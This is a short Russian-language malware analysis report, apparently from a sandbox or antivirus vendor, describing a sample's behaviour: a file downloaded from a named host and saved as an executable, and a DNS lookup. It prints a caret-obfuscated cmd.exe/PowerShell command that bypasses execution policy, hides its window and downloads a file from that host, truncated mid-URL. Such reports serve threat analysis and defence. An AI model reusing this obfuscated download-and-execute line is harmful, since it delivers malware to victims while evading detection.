Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://bestflowstou.wang/search.php как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "Po^WeRS^HE^L^L.e^xE^ ^-EXEc^uTi^o^nPOLIC^Y BY^pA^ss -NOPr^OF^ile^ ^-WINDOwstylE ^H^i^dd^En^ (^NE^w^-Ob^Je^c^t ^S^Y^stEm.neT^.we^bc^lIE^n^T).^DOwN^Lo^Ad^F^Ile('http://bestflowstou.wan...
Сетевая активность
UDP
- DNS ASK be####owstou.wang
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "Po^WeRS^HE^L^L.e^xE^ ^-EXEc^uTi^o^nPOLIC^Y BY^pA^ss -NOPr^OF^ile^ ^-WINDOwstylE ^H^i^dd^En^ (^NE^w^-Ob^Je^c^t ^S^Y^stEm.neT^.we^bc^lIE^n^T).^DOwN^Lo^Ad^F^Ile('http://bestflowstou.wan...' (со скрытым окном)
